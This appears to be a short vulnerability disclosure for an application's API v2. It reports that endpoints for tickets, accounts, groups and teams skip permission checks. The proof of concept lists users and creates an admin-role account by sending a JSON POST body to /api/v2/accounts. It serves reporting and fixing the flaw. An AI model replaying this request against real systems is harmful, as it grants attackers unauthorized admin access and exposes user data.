# Description
There are some `api v2` doesn’t check permission allow attackers to retrieve/edit information `ticket`,`account`,`group`,`department`,`team`,`ElasticSearch`
# Proof of Concept
*Get users list*
“`
1. Login.
2. Go to `/api/v2/accounts?type=all`.
3. Users list return.
“`
*Create user with admin role*
“`
1. Get the admin role id in `/api/v2/accounts`.
2. Send POST to `/api/v2/accounts`.
“`
“`
{“username”:”test21233″,”fullname”:”test21233″,”title”:”test2″,”email”:”test2@test31232.cv”,”teams”:[“627ce1fd9f59377095600ce9″],”role”:”627ce1fd9f59377095600ce1″,”password”:”test2test2″,”passwordConfirm”:”test2test2″}
“`
3. Create successfully.
# Note
Many api endpoint get vulnerable, i just show piece of attack vector that can happen.